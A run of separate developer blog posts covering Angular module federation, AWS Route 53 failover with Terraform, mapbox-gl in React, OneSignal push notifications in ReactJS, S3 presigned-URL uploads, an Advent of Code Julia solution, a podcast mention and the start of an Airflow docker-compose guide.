While the example schematic will generate the `exposes` section with the `AppModule` and `AppComponent` I would **strongly** advise against this.
When serving the remote and shell to develop locally, the sites will be deployed to:
- localhost:5000
- localhost:6000
When you make changes to the `remote` app folder's contents, only `localhost:6000` will live-reload.
This means that, for local development, consuming the remote inside the shell app is not a sustainable way to work on remote-specific functionality.
So what do I propose?
The `AppModule` of your remote app should be your "demo" or self-deployed landscape. You will import modules and providers there to establish a foundation for locally testing your remote app in isolation. Alongside the `AppModule`, keep a separate module containing the cohesive functionality you actually want to expose, i.e: `LoginModule`.
Exposing and pulling in `AppModule` itself, by contrast, has the potential to pull in duplicate root providers, as well as duplicate assets and styles.
Instead with:
```js
exposes: {
'./Module':
'./apps/remote/src/app/login/login.module.ts',
},
```
> `./Module` is nomenclature you can define as you please. I would recommend being more specific in a diverse system.
The shell app can still access the shared functionality to pull in, but doesn't pull in more than it needs to.
I can locally develop on `localhost:6000`, having an accurate test bed for my application and live-dev against the changes with ease.
Now that the foundation of module federation has been set, let's jump into dynamically swapping modules at runtime.
---
## Dynamic Runtime modules
All of the top resources available for module federation show statically referencing the modules in your shell app's route definition.
```ts
import { loadRemoteModule } from '@angular-architects/module-federation';
[...]
const routes: Routes = [
[...]
{
path: 'flights',
loadChildren: () =>
loadRemoteModule({
remoteEntry: 'http://localhost:3000/remoteEntry.js',
remoteName: 'mfe1',
exposedModule: './Module'
})
.then(m => m.FlightsModule)
},
[...]
];
```
This serves a purpose when your application wants to independently build and manage known features. It doesn't, however, let you conditionally serve features or create an application that has no knowledge at build time of which features exist.

### Dynamic module federation
Dynamic module federation attempts to resolve this by allowing you to independently request modules before bootstrapping Angular:
```ts
import { loadRemoteEntry } from '@angular-architects/module-federation';
Promise.all([
loadRemoteEntry('http://localhost:3000/remoteEntry.js', 'mfe1')
])
.catch(err => console.error('Error loading remote entries', err))
.then(() => import('./bootstrap'))
.catch(err => console.error(err));
```

Better... but still has a few drawbacks:
- What if my remote module is routable? Will it recognize the route when I navigate directly to it?
- How does this impact lazy loading?
- Remote entries are still hard-coded
### Dynamic runtime module federation
We need a decoupled shell that can dynamically request federated modules at runtime.
#### A real use case?
On our team, we want to dynamically serve separate authentication experiences for customers. Some customers use our platform's stock username/password authentication. Others have their own corporate SSO. All of them have strict branding standards that aren't compatible with each other.
We do however, want all customers to share the primary functionality of our platform - content management and learning delivery. Once they login to the application, they only need branding for their corporate logo and primary brand color; they can use all the existing interfaces.

#### Less rigid example?
Feature toggles in an application. Some customers have "X" others have "Y". You want to serve one app that can respond to "X" and "Y".
#### Getting started
Authentication deals with routing and we need to allow our users to navigate to `/authentication/login` and get served the correct federated module for their company.
We will be using an injection token to store our route definitions as they relate to module federation.
```ts
export const PLATFORM_ROUTES = new InjectionToken<Routes>('Platform routes for module federation');
```
If you used the schematic discussed above, you should have a `bootstrap.ts` file. Prior to bootstrapping Angular, we need to request the registry of modules that should exist for this user. This can be any network call; for this demo we will use a local JSON asset called `platform-config.json`.
The platform config describes all the modules: the location of each module, the module name to bootstrap, and the route to register in the shell app for the remote module.
```json
{
"authentication": {
"path": "authentication",
"remoteEntry": "http://localhost:5001/remoteEntry.js",
"remoteName": "coreAuthentication",
"exposedModule": "./LoginModule",
"exposedModuleName": "LoginModule"
}
}
```
- `path` is the Angular route namespace to load the remote module under.
- `remoteEntry` is the served location of your remote module. In a built environment this would be replaced with wherever the remote is hosted (CDN, Cloud Foundry, S3 asset, etc.); here it references where we will be serving our Angular apps for local development.
- `remoteName` is the `name` declared in your remote app's `webpack.config.js`.
- `exposedModule` is the key in your remote app's `webpack.config.js` for the exposed module (your nomenclature)
- `exposedModuleName` is the name of the Angular module that was exposed; this is leveraged for lazy loading.
In `bootstrap.ts` we will consume this asset and build the injection token value:
```ts
import { enableProdMode } from '@angular/core';
import { platformBrowserDynamic } from '@angular/platform-browser-dynamic';
import { Routes } from '@angular/router';
import { loadRemoteModule } from '@angular-architects/module-federation';
import { AppModule } from './app/app.module';
import { PLATFORM_ROUTES } from './app/platform-routes';
import { environment } from './environments/environment';
if (environment.production) {
enableProdMode();
}
fetch('/assets/platform-config.json').then(async (res) => {
const config = await res.json();
const platformRoutes: Routes = [];
for (const [key, value] of Object.entries<any>(config)) {
platformRoutes.push({
path: value.path,
loadChildren: () =>
loadRemoteModule({
remoteEntry: value.remoteEntry,
remoteName: value.remoteName,
exposedModule: value.exposedModule,
}).then((m) => m[value.exposedModuleName]),
});
}
platformBrowserDynamic([
{
provide: PLATFORM_ROUTES,
useValue: platformRoutes,
multi: true,
},
])
.bootstrapModule(AppModule)
.catch((err) => console.error(err));
});
```
By passing the providers to `platformBrowserDynamic`, we set a static provider value prior to bootstrap that can then be consumed during bootstrap.
In the module responsible for your shell app's router module declaration (typically `app-routing.module.ts`), update as follows:
```ts
import { NgModule } from '@angular/core';
import { RouterModule, ROUTES, Routes } from '@angular/router';
import { PLATFORM_ROUTES } from './platform-routes';
@NgModule({
imports: [
RouterModule.forRoot(
[
/* Declare root routes in the factory below */
],
{ initialNavigation: 'enabled' }
),
{
ngModule: RouterModule,
providers: [
{
provide: ROUTES,
useFactory: (
staticRoutes: Routes = [],
dynamicRoutes: Routes = []
) => {
let rootRoutes: Routes = [];
if (Array.isArray(staticRoutes)) {
rootRoutes = [...staticRoutes];
}
if (Array.isArray(dynamicRoutes)) {
rootRoutes = [...rootRoutes, ...dynamicRoutes];
}
rootRoutes.push({
path: '**',
redirectTo: '/authentication/login',
});
return rootRoutes;
},
deps: [ROUTES, PLATFORM_ROUTES],
},
],
},
],
exports: [RouterModule],
})
export class AppRoutingModule {}
```
Let's explain a bit...
`RouterModule.forRoot([])` establishes a lot of necessary providers and functionality required for routing. Under the hood, all router modules roll up their route definitions into an injection token named `ROUTES`. We can bootstrap the module and immediately provide a new value on top for `ROUTES`.
To allow our shell app to have its own built-in routes as well as the dynamic runtime routes, we use a factory to concatenate the static routes and the dynamic routes (from our injection token `PLATFORM_ROUTES`).
Lastly, we have a fallback route, as routes will execute first-to-last, to handle global redirect behavior for unhandled routes.
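The factory's merging logic can be exercised on its own as plain JavaScript, outside of Angular (the route objects here are simplified for illustration):

```javascript
// Standalone sketch of the ROUTES factory logic: concatenate the shell's
// static routes with the dynamic runtime routes, then append the wildcard
// fallback so unmatched paths redirect to the login page.
function mergeRoutes(staticRoutes, dynamicRoutes) {
  let rootRoutes = [];
  if (Array.isArray(staticRoutes)) {
    rootRoutes = [...staticRoutes];
  }
  if (Array.isArray(dynamicRoutes)) {
    rootRoutes = [...rootRoutes, ...dynamicRoutes];
  }
  rootRoutes.push({ path: '**', redirectTo: '/authentication/login' });
  return rootRoutes;
}

const merged = mergeRoutes([{ path: 'home' }], [{ path: 'authentication' }]);
console.log(merged.map((r) => r.path)); // -> [ 'home', 'authentication', '**' ]
```

Because the wildcard is pushed last, it only matches paths that neither the static nor the dynamic routes claimed.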
## Conclusion
At this point, we are rolling. We can now change our config while serving the different remotes and shell and see it swap out the served bundle. In a real environment, the config data would come from an endpoint.

If you read this far I appreciate it. Module federation in Angular is a very new concept and I welcome feedback and questions on this topic! | seanperkins |
708,593 | AWS Route 53 with Terraform | In this article we will imagine that your team received two very important pieces of information. The... | 0 | 2021-05-25T21:53:01 | https://augustovaldivia.ca/r53.html | aws, terraform, awsroute53, cdn | In this article we will imagine that your team received two very important pieces of information. The first being about issues regarding the company website and the second being about the future of your company.
First, the Social media team has revealed to your team that a significant proportion of your customer base are leaving bad reviews about the stability of your website. Customers describe that the website has been down frequently during the past month on different days of the week and at random times during the day.
Second, and this is the good news: the company has started looking into moving their online business from their on-premise environment to a public cloud provider.
For this project the company’s main requirements are:
- Scalable cloud Domain Name System (DNS) webserver
- Very reliable
- Highly available
- Cost effective
Your team has received the task of researching the three big public cloud providers on the market and creating a presentation with the best options for this migration. Your manager has given you the task of providing details about the Amazon Web Services (AWS) DNS service and presenting a proof of concept (POC) in front of your company directors to show what this infrastructure would look like in the cloud.
**Research stage**
As your research advances you discover that AWS-Route53 provides the following functions:
- Domain registration
- DNS service
- Health checking
- Private DNS resolution within VPCs using private hosted zones
***Looking promising already – right?***
**Development stage**
Based on the research stage, it looks like AWS-Route53 has great components that could help meet the company's requirements.
**How can AWS-Route53 help us with our issue?**
Health checking is a great AWS-Route53 feature that sends automated requests over the internet to an application, verifying that it is working, reachable, and available. In addition, AWS-Route53 has different policies that can be used under different circumstances.
**Types of routing policies:**
- Simple routing policy
- Weighted routing policy
- Latency-based routing policy
- Failover routing policy
- Geolocation routing policy
**In this stage you will focus on building and deploying the following AWS-services:**
- Availability zone
- VPC
- Public subnet
- Internet gateway
- Route table
- EC2
- Security groups
- Elastic Ip
- Route 53
- S3 bucket
**For readability some services are not included on this diagram: AWS-Route 53 Failover routing policy**


**Conclusion**
On the day of your presentation, you will be able to showcase a full AWS-Route53 failover routing policy demo in which a primary record, the EC2 instance, automatically switches over to a secondary backup record, an S3 bucket, after the primary fails the AWS-Route53 health check. And because you are all about code, you will be using Terraform to provision this deployment.
>"Everything fails, all the time"
[AWS CTO, Werner Vogels](https://cacm.acm.org/magazines/2020/2/242334-everything-fails-all-the-time/fulltext)
And servers that host websites are no exception. Servers and systems can fail for several reasons. However, having backup plans ensures that when such problems occur users of the application do not experience any downtime.
**Note:** to complete this project you will need a registered domain.
**Functions, arguments and expressions of Terraform that were used in the above project:**
[providers](https://www.terraform.io/docs/language/providers/index.html)
[variables](https://www.terraform.io/docs/language/values/index.html)
[modules](https://www.terraform.io/docs/language/modules/index.html)
[resources](https://www.terraform.io/docs/language/resources/index.html)
[types and values](https://www.terraform.io/docs/language/expressions/types.html)
[Find the Terraform repo and directions for this project here](https://github.com/ValAug/AWS_Route53_Terraform)
| valaug |
739,066 | Managing mapbox-gl state in React app | Description of the problem In the course of my work at geoalert.io, I have repeatedly... | 0 | 2021-06-25T11:11:05 | https://dev.to/dqunbp/managing-mapbox-gl-state-in-react-app-4328 | react, mapbox, xstate, javascript | ## Description of the problem
In the course of my work at [geoalert.io](http://geoalert.io/), I have repeatedly encountered the problem of managing the state of a `React` application with an embedded [mapbox-gl](https://docs.mapbox.com/mapbox-gl-js/api/) map
I plan to cover the topic in a series of articles, including this one:
- Managing `mapbox-gl` state in `React` app
- [Using `mapbox-gl` in `React` with `Next.js`](https://dev.to/dqunbp/using-mapbox-gl-in-react-with-next-js-2glg)
- Managing the state of a `React` application with `mapbox-gl` using `XState`
The last two articles mentioned correspond to the 2 main problems I encountered while using `mapbox-gl` in `React`
- Embedding `mapbox-gl` in `React` - storing the built-in `mapbox-gl` instance and making it accessible from other app components
- Managing the state of a `React` app with `mapbox-gl` - since `mapbox-gl` has an internal state, you need to synchronize it with the state of the app itself
## Embedding `mapbox-gl`in `React`
There are several options for solving this problem, here are the most popular among them:
- Using ready-made wrapper libraries
- Self-managed native integration; for this option I would highlight 2 cases
- Implementing as a `React Component`
- Storing the map instance outside of `React`
### Using ready-made wrapper libraries
The most popular among them
- [react-map-gl](https://github.com/visgl/react-map-gl) - a solution from [uber](https://www.uber.com/), perhaps the most sophisticated of them all; its main drawbacks:
- Steep learning curve: although it has rich functionality, including for managing state, the library API is rather difficult to understand
- Has [almost 1MB bundle size](https://bundlephobia.com/package/react-map-gl@6.1.16), which is quite a lot
- [react-mapbox-gl](https://github.com/alex3165/react-mapbox-gl) - ranks second in popularity, has an order of magnitude smaller bundle size and more concise and easy-to-understand api
- [@urbica/react-map-gl](https://github.com/urbica/react-map-gl) - the size of the bundle and api is about the same as [react-mapbox-gl](https://github.com/alex3165/react-mapbox-gl)
- [use-mapbox-gl](https://github.com/dqunbp/use-mapbox-gl) - I will use the opportunity to attach my solution, this is a lightweight React hook wrapping `mapbox-gl`
### Self-managed native integration
#### Implementing as a `React Component`
The main idea of this approach is to create a web map component that contains a `DOM` node for initializing the map and the initialization logic, and that also stores an instance of the created map
The `mapbox-gl` documentation contains [instructions](https://docs.mapbox.com/help/tutorials/use-mapbox-gl-js-with-react/) on how to do this for a new `React` application.
A continuation and more detailed consideration of this issue, with various implementation examples, awaits in the next article
{% link https://dev.to/dqunbp/using-mapbox-gl-in-react-with-next-js-2glg %}
#### Storing the map instance outside of `React`
An example of such an implementation will also be considered in the next article
## Managing the state of a `React` app with `mapbox-gl` using `XState`
As a rule, tutorials on using `mapbox-gl` in `React` end once the method of integrating the former into the latter has been described. Articles about state management in such applications are rare, and most of those on this topic are outdated by now.
[Here's an example](https://medium.com/critigenopensource/an-approach-to-integrating-mapboxgl-in-react-redux-b50d82bc0ed0) of a nice article from [@Cole Beese](https://medium.com/@cole.bessee)
This article describes an example of state management with Redux using [React class components](https://reactjs.org/docs/components-and-props.html)
As mentioned above, `mapbox-gl` has internal state, for example properties such as:
- Map center coordinates
- Zoom
- Bearing
- Current map style
- Vector or raster user layers
- etc.
Usually the application interface contains, in addition to the map itself, elements whose display depends on the internal state of the map: for example, an element that displays the current coordinates and zoom, [as in the above example](https://docs.mapbox.com/help/tutorials/use-mapbox-gl-js-with-react/)

In addition to the state inside the map instance, the application can also have its own internal state, in our case, [XState](https://github.com/davidkpiano/xstate) will be used for this
I'll cover this in more detail with an example of using `XState` in my next post
Useful links:
- [MAPBOX GL JS + REACT](https://www.mapbox.com/blog/mapbox-gl-js-react)
- [Use Mapbox GL JS in a React app](https://docs.mapbox.com/help/tutorials/use-mapbox-gl-js-with-react/)
- [An approach to integrating MapboxGL in React / Redux](https://medium.com/critigenopensource/an-approach-to-integrating-mapboxgl-in-react-redux-b50d82bc0ed0) | dqunbp |
739,737 | How to Add Push Notifications into a ReactJS App | Push notifications are a useful tool to engage and retain users. In this tutorial, we'll show you... | 0 | 2021-06-28T16:48:32 | https://onesignal.com/blog/how-to-integrate-push-notifications-in-react/ | react, webdev, javascript, frontend | ---
title: How to Add Push Notifications into a ReactJS App
published: true
date: 2021-06-25 22:53:02 UTC
tags: react, webdev, javascript, frontend
canonical_url: https://onesignal.com/blog/how-to-integrate-push-notifications-in-react/
---

Push notifications are a useful tool to engage and retain users. In this tutorial, we'll show you how to integrate with OneSignal for free in order to leverage push notifications in your ReactJS app.
## **OneSignal & Your Browser's Push API**
The browser's push API gives web applications the ability to receive messages from a server whether or not the web app is in the foreground or currently loaded on a user agent. This lets you deliver asynchronous notifications and updates to users who opt-in, resulting in better engagement with timely new content.
This tutorial will cover how to integrate OneSignal push notifications into your app using our typical setup process. Part one of this guide covers the OneSignal setup process. Part two of this guide covers how to integrate with ReactJS using a basic setup method. Part three covers an advanced setup method you can implement after completing the basic setup. The advanced setup will unlock even more message customization and automation opportunities for your website or app.
## **Guide Overview**
- **[Part 1: Set Up Your OneSignal Account](#part-1-set-up-your-onesignal-account)**
- [Web Configuration](#web-configuration)
- **[Part 2: Quick Push Notification Setup In ReactJS](#part-2-quick-push-notification-setup-in-reactjs)**
- [Allow Web Push Notifications](#allow-web-push-notifications)
- [Send Web Push Notifications](#send-web-push-notifications)
- **[Part 3: Advanced Push Notification Setup In ReactJS](#part-3-advanced-push-notification-setup-in-reactjs)**
This tutorial requires some basic knowledge of React. I'm using the [Create React App](https://create-react-app.dev/) to generate my project and **NodeJS version 14.16**.
**Additional ReactJS Setup Resources:**
- [Quick React Setup](https://github.com/OneSignal/OneSignal-React-Sample/tree/quick-setup)
- [Advanced React Setup](https://github.com/OneSignal/OneSignal-React-Sample)
### Creating Your React App
Inside of your terminal run the following commands to create a new React project using Create React App:
```shell
npx create-react-app react-onesignal
cd react-onesignal
npm start
```
For the official Create React App documentation, click [**here**](https://create-react-app.dev/docs/getting-started) **.**
## **Part 1: Set Up Your OneSignal Account**
To begin, [login](https://app.onesignal.com/login) to your OneSignal account or [create a free account](https://app.onesignal.com/signup). Then, click on the blue button entitled **New App/Website** to configure your OneSignal account to fit your app or website.

Insert the name of your app or website. Select _ **Web Push** _ as your platform.

Click on the blue button entitled, **Next: Configure Your Platform**.
### **Web Configuration**
Under **Choose Integration**, select the **Typical Site** option.
In the **Site Setup** section, enter your chosen web configuration. In my case, the configuration looks like this:

Notice that for testing purposes I'm entering my localhost URL (http://localhost:3000). If you are doing the same, make sure you click on the **LOCAL TESTING** option. This ensures HTTP localhost is treated as HTTPS for testing.
Under **Permission Prompt Setup**, you will see three vertical blue dots under the **Actions** header on the far right side of the screen. Click on the blue dots and select **Edit** from the drop-down menu.

A window will open with the configuration of our [push notification Slide Prompt](https://documentation.onesignal.com/docs/slide-prompt). Confirm that **Auto-prompt** is enabled (toggled to the right).
Under **Show When**, you can change the second increment to alter how long your slide prompt will delay after a user visits your page. You can leave it as it is, or you can reduce the seconds so that your prompt appears sooner. Once you've input your chosen delay increment, click the grey **Done** button located at the bottom right corner of the window.

After clicking **Done**, scroll down to the bottom of the page and click **Save** to save your auto-prompt selections.
You will be redirected to a different page with an important step: Downloading the SDK files. Click **DOWNLOAD ONESIGNAL SDK FILES** and save them on your computer to retrieve later.

Under the section entitled **Add Code to Site**, you will see a grey button that allows you to copy the code snippet. Click the grey **COPY CODE** button.

## **Part 2: Quick Push Notification Setup In ReactJS**
In your ReactJS project folder, navigate to the **public** folder and open the **index.html** file. Inside of the head HTML tag, paste the code you previously copied from the OneSignal page.
Now, locate the SDK files you downloaded on your computer and insert them inside of the **src** folder of your ReactJS app.

### **Allow Web Push Notifications**
Run the ReactJS app and visit your website. You should see the following prompt appear after your chosen time delay interval:

Click on the blue **Allow** button to enable push notifications on your browser.
### **Send Web Push Notifications**
It’s time to send your first web push notification! To do so, login to your OneSignal account and navigate to the **Dashboard** tab. On the dashboard page, click on the blue button that says **New Push**.

You will be redirected to a new window that will allow you to customize your push notification. Under **Audience**, make sure that **Send to Subscribed Users** is selected. Then, create your message by adding your message title, content, and an image. Because this is the first notification your subscribers will receive, you may choose to craft a simple welcome message to confirm that they've been subscribed and reinforce the value that notifications will provide.
Under the **Delivery Schedule** section, select **Immediately** and **Send to everyone at the same time** to send to all your current web push subscribers. If you have just finished setting up your OneSignal account, chances are you're the first and only subscriber. If your app or website is heavily trafficked and other users have already opted in to receive push notifications, you may want to select **Send to a particular segment(s)** to test your message out on a specific audience. When you're ready to send your message, click on the blue **Review and Send** button at the bottom of the screen.

A small popup will appear for you to review your message. Once you are satisfied, click on the blue **Send Message** button. You should receive a web push notification on your device! 🚀
## **Part 3: Advanced Push Notification Setup In ReactJS**
If you want the ability to use OneSignal across your entire ReactJS app, complete these advanced push notification setup steps after completing the quick push notification setup.
Inside of your **index.html** file, remove the following code:
```html
<script>
window.OneSignal = window.OneSignal || [];
OneSignal.push(function() {
OneSignal.init({
appId: "YOUR-APP-ID",
});
});
</script>
```
Make sure you keep the CDN link.
Inside of your **App.js** file, you will enter the following lines of code:
```javascript
window.OneSignal = window.OneSignal || [];
const OneSignal = window.OneSignal;
```
The code above will make the `window` object aware of the `OneSignal` property. This will allow you to have access to the OneSignal SDK properties after the SDK has loaded into your web application.
In the same file we will create a `useEffect`. This hook will contain the initialization code needed to start OneSignal. Remember to add the empty dependency array `[]` to your `useEffect` hook. OneSignal's `init()` method can only be called once, and the dependency array prevents the effect from being triggered multiple times and firing `init()` again.
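To illustrate the idea outside of React (this is not OneSignal API, just a plain-JavaScript sketch of the run-once guarantee the empty dependency array gives us):

```javascript
// Plain-JavaScript sketch of the "initialize at most once" constraint that
// the empty dependency array enforces for the effect.
function makeInitOnce(init) {
  let initialized = false;
  return () => {
    if (initialized) return false; // subsequent calls are no-ops
    initialized = true;
    init();
    return true;
  };
}

let calls = 0;
const initOnce = makeInitOnce(() => { calls += 1; });
initOnce(); // first call runs init
initOnce(); // ignored
console.log(calls); // -> 1
```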
```javascript
useEffect(() => {
OneSignal.push(() => {
OneSignal.init({
appId: "YOUR-APP-ID"
})
});
},[]);
```
Now, you can keep expanding your code to make use of different features of the OneSignal SDK across your ReactJS app by passing the `OneSignal` variable to different components. You can also use the [custom code setup](https://documentation.onesignal.com/docs/web-push-custom-code-setup) to modify the configurations of your prompt inside of your ReactJS application without using the OneSignal dashboard. To learn more about our Web Push SDK, visit our web push [SDK documentation](https://documentation.onesignal.com/docs/web-push-sdk). | devpato |
752,534 | Upload Files in a Web Application with AWS S3 | I recently finished building an application that allowed users to upload PDFs that I can then host... | 0 | 2021-08-13T12:31:12 | https://thomasstep.com/blog/uploading-files-in-a-web-application-with-aws-s3 | aws, react, javascript, webdev | ---
title: Upload Files in a Web Application with AWS S3
published: true
date: 2021-07-06 00:00:00 UTC
tags: [ aws, react, javascript, webdev ]
canonical_url: https://thomasstep.com/blog/uploading-files-in-a-web-application-with-aws-s3
---
I recently finished building an application that allowed users to [upload PDFs that I can then host and direct others to via a QR code](https://papyrusmenus.com/). I knew that I wanted to build the application using AWS and I figured that S3 would be my best option for storing the uploaded files, but I had never dealt with uploading files. The solution turned out to be easier than I expected, but it also was not super straightforward.
It turns out that handling an upload with HTML is just as easy as creating an [`input` tag with the type set to `file`](https://developer.mozilla.org/en-US/docs/Web/API/File/Using_files_from_web_applications). The `input` tag draws the `Browse...` button that everyone already knows and handles bringing up a user’s local file storage for choosing a file. I added an `onChange` event handler to the `input` tag which pulled the files from the event payload provided, verified the file type uploaded, verified that the file did not surpass my app’s maximum file size limit, then saved the file’s binary contents as the state. I subsequently had another button that uploaded the file selected, but for now, here is the code that handled a user selecting a file to upload.
```jsx
async function handleFileSelection(event) {
  const MAX_SIZE = 1000000; // maximum upload size, in bytes
  const files = event.target.files || event.dataTransfer.files;
  if (files.length !== 1) {
    return;
  }
  const file = files[0];
  if (file.type !== 'application/pdf') {
    return;
  }
  if (file.size > MAX_SIZE) {
    return;
  }
  const fileBinary = await file.arrayBuffer();
  setUploadedMenu(fileBinary);
}
return (
  ...
  <input type="file" onChange={handleFileSelection}/>
  ...
);
```
The button that saved the file needed to jump through one more hoop before actually uploading the file: requesting a presigned URL from the S3 bucket. Since I did not want to expose any AWS secrets to the browser, using a presigned URL was the preferred way of handling that upload. I gave the presigned URL a short lifespan and it already has credentials built in that allowed the browser to upload without needing AWS credentials. The browser makes some API calls to a protected API that has the correct permissions to the S3 bucket, which generated the presigned URL. The request from the browser that grabbed the presigned URL looked something like the following.
```js
const response = await axios({
method: 'get',
url: '/api/get-presigned-url',
});
const { data: { presignedUrl } } = response;
```
After the presigned URL was returned, all I needed to do was `PUT` the file’s binary.
```js
axios({
method: 'PUT',
url: presignedUrl,
headers: {
'Content-Type': 'application/pdf',
},
data: uploadedMenu,
timeout: 10000,
});
```
And just like that the user's file uploads to my S3 bucket 🎉. It took a bit for me to get this code and sequence correct. The Lambda function I used to generate the presigned URL was lacking a few permissions at first. The URL was still generated, but since the Lambda generating it did not have the proper permissions, the `PUT` request was denied. I also had some confusion around the data type that needed to be `PUT` to S3. I ultimately ended up [going with an `ArrayBuffer`](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/ArrayBuffer), but there may be other methods of uploading a file.
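The Lambda side isn't shown above. Purely as a hypothetical sketch (bucket name, key scheme, and expiry are invented placeholders, and the actual signing is done by the AWS SDK's S3 presigner), the protected endpoint essentially assembles short-lived signing parameters whose `ContentType` matches the header the browser will send:

```javascript
// Hypothetical sketch of the protected endpoint's role: build parameters
// for a short-lived presigned PUT URL and hand them to a signer function.
// In a real Lambda, the signer would be the AWS SDK.
function buildPresignParams(filename) {
  return {
    Bucket: 'my-upload-bucket',     // placeholder bucket name
    Key: `uploads/${filename}`,     // placeholder key scheme
    ContentType: 'application/pdf', // must match the browser's Content-Type header
    Expires: 300,                   // short lifespan, in seconds
  };
}

function getPresignedUploadUrl(filename, sign) {
  return sign(buildPresignParams(filename));
}
```

If the `Content-Type` sent with the `PUT` differs from the one the URL was signed for, S3 rejects the upload, which is one more way this sequence can silently fail.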
Until next time, we’ll see what I build next 🛠. | thomasstep |
923,932 | Advent of Code 2021 - Day 10 | It’s that time of year again! Just like last year, I’ll be posting my solutions to the Advent of Code... | 16,232 | 2021-12-11T22:11:12 | https://www.ericburden.work/blog/2021/12/11/advent-of-code-2021-day-10/ | julia, adventofcode, coding | ---
title: Advent of Code 2021 - Day 10
published: true
date: 2021-12-11 00:00:00 UTC
tags: julia, adventofcode, coding
canonical_url: https://www.ericburden.work/blog/2021/12/11/advent-of-code-2021-day-10/
series: Advent of Code 2021
---
It’s that time of year again! Just like last year, I’ll be posting my solutions to the [Advent of Code](https://adventofcode.com/) puzzles. This year, I’ll be solving the puzzles in [Julia](https://julialang.org). I’ll post my solutions and code to [GitHub](https://github.com/ericwburden/advent_of_code_2021) as well. I had a blast with AoC last year, first in R, then as a set of exercises for learning Rust, so I’m really excited to see what this year’s puzzles will bring. If you haven’t given AoC a try, I encourage you to do so along with me!
# Day 10 - Syntax Scoring
Find the problem description [HERE](https://adventofcode.com/2021/day/10).
## The Input - Simplicity Itself
I’m mostly just leaving this section in today for the sake of consistency. Reading in the data today is just a matter of reading each line and `collect`ing it into a `Vector{Char}`, then returning the list of lines.
```julia
function ingest(path)
return open(path) do f
[collect(line) for line in readlines(f)]
end
end
```
## Part One - Chunkopolypse
Ah, my favorite error message: “Everything is wrong!”. Essentially, each line consists of a string of brackets (in four different flavors) that is not well-formed in some way, either because some of the closing brackets are missing (called “incomplete”) or because an opening bracket is closed by a bracket that does not match (called “corrupted”). The “corrupted” bracket may be separated from the opening bracket by any number of opening and closing brackets. First, we need to identify all the “corrupted” closing brackets, get the corresponding score, then sum all the scores.
The simplest way I know to identify the “corrupted” closing bracket is to iterate over the characters from left to right, adding each opening bracket to the top of a stack. Whenever a closing bracket is found, check the top of the stack. If the two make a matched pair, remove the opening bracket from the top of the stack and move on. If not, then we’ve found our “corrupted” bracket!
```julia
# Some useful constants
OPENING_BRACKETS = Set(['(', '[', '{', '<'])
CLOSING_BRACKETS = Set([')', ']', '}', '>'])
MATCHES = Dict([
'(' => ')', '[' => ']', '{' => '}', '<' => '>',
')' => '(', ']' => '[', '}' => '{', '>' => '<'
])
POINTS = Dict([')' => 3, ']' => 57, '}' => 1197, '>' => 25137])
# Some useful utility functions
isopening(b) = b in OPENING_BRACKETS
isclosing(b) = b in CLOSING_BRACKETS
ismatch(lhs, rhs) = !ismissing(rhs) && !ismissing(lhs) && rhs == MATCHES[lhs]
# Search a line for the "corrupted" character by putting all opening
# brackets onto a stack, removing them when we find a match, and
# returning the unmatched bracket if it doesn't match.
function getcorruptedchar(line)
stack = []; sizehint!(stack, length(line))
for bracket in line
if isopening(bracket)
push!(stack, bracket)
continue
end
lastbracket = pop!(stack)
ismatch(lastbracket, bracket) && continue
return bracket
end
return missing
end
# Get the "corrupted" character from each line, look up its score,
# then add it to the total score.
function part1(input)
total = 0
for char in map(getcorruptedchar, input)
ismissing(char) && continue
total += POINTS[char]
end
return total
end
```
I feel like finding “balanced” brackets/parentheses is a pretty common problem. At least, it’s one I’ve seen pop up in a couple of different places, so it seems like this algorithm is a pretty good one to have on hand.
## Part Two - Stack Attack
Part two is very similar to part one, except now we’re iterating over our lines from back to front, and keeping “all” the unmatched brackets instead of just one.
```julia
# Another useful constant
SCORE_FOR = Dict([')' => 1, ']' => 2, '}' => 3, '>' => 4])
# And another utility function!
notcorrupted(line) = ismissing(getcorruptedchar(line))
# Similar to before. This time, we start adding brackets from
# the end of the line to our stack. If it's a closing bracket,
# we add it to our stack. If it's an opening bracket, we get the
# closing bracket off the top of our stack. If they match, we just
# keep going. If not, we add the bracket to our list of unmatched
# opening brackets.
function getclosingbrackets(line)
closingbrackets = []; sizehint!(closingbrackets, length(line))
stack = []; sizehint!(stack, length(line))
while !isempty(line)
bracket = pop!(line)
if isclosing(bracket)
push!(stack, bracket)
continue
end
if isopening(bracket)
stackbracket = isempty(stack) ? missing : pop!(stack)
ismatch(bracket, stackbracket) && continue
push!(closingbrackets, MATCHES[bracket])
end
end
return closingbrackets
end
# Given a list of opening brackets, look up each bracket's corresponding
# score and add it to a running total.
function calculatescore(unmatched)
total = 0
for bracket in unmatched
total *= 5
total += SCORE_FOR[bracket]
end
return total
end
# For each line, get the unmatched opening brackets, and calculate the
# score for that line. With all the line scores, we just sort them and
# return the score from the middle.
function part2(input)
(scores
= input
|> (lines -> filter(notcorrupted, lines))
|> (lines -> map(getclosingbrackets, lines))
|> (lines -> map(calculatescore, lines)))
sort!(scores)
middle = (length(scores) + 1) ÷ 2
return scores[middle]
end
```
Nice. It’s basically part one in reverse. No sweat!
# Wrap Up
This was a bit of a breather, but probably in large part because I’ve seen a couple of different variations on this puzzle before. I suspect it could be a bit tricky if you’re trying to come up with the algorithm from scratch. I don’t have a lot else to say about this one, so I’ll see you tomorrow!
If you found a different solution (or spotted a mistake in one of mine), please drop me a line! | ericwburden |
790,714 | New To Podcasting | We are new to podcasting, would love to hear from you all! Awkward Conversations & Dirty... | 0 | 2021-08-13T13:36:36 | https://dev.to/jackdlacy/new-to-podcasting-o8f | relationship | We are new to podcasting, would love to hear from you all!
Awkward Conversations & Dirty Secrets
Jack and Crystal Lacy
Spotify, Google, Apple, Anchor etc.
Thanks
Jack Lacy | jackdlacy |
792,408 | Airflow Quick Start With docker-compose on AWS EC2 | Airflow Quick Start With docker-compose on AWS EC2 | 14,113 | 2021-08-15T11:53:32 | https://dev.to/awscommunity-asean/airflow-quick-start-with-docker-compose-on-aws-ec2-fj3 | docker, ec2, cloudopz, airflow | ---
title: Airflow Quick Start With docker-compose on AWS EC2
published: true
description: Airflow Quick Start With docker-compose on AWS EC2
tags: docker, ec2, cloudopz, airflow
cover_image: https://github.com/vumdao/airflow-docker/blob/master/cover.jpg?raw=true
series: "Apache Airflow The Hard-Way"
---
## Abstract
To quickly set up and start learning [Apache Airflow](https://airflow.apache.org/docs/apache-airflow/stable/index.html), we will deploy Airflow using docker-compose running on AWS EC2
## Table Of Contents
* [Introduction](#Introduction)
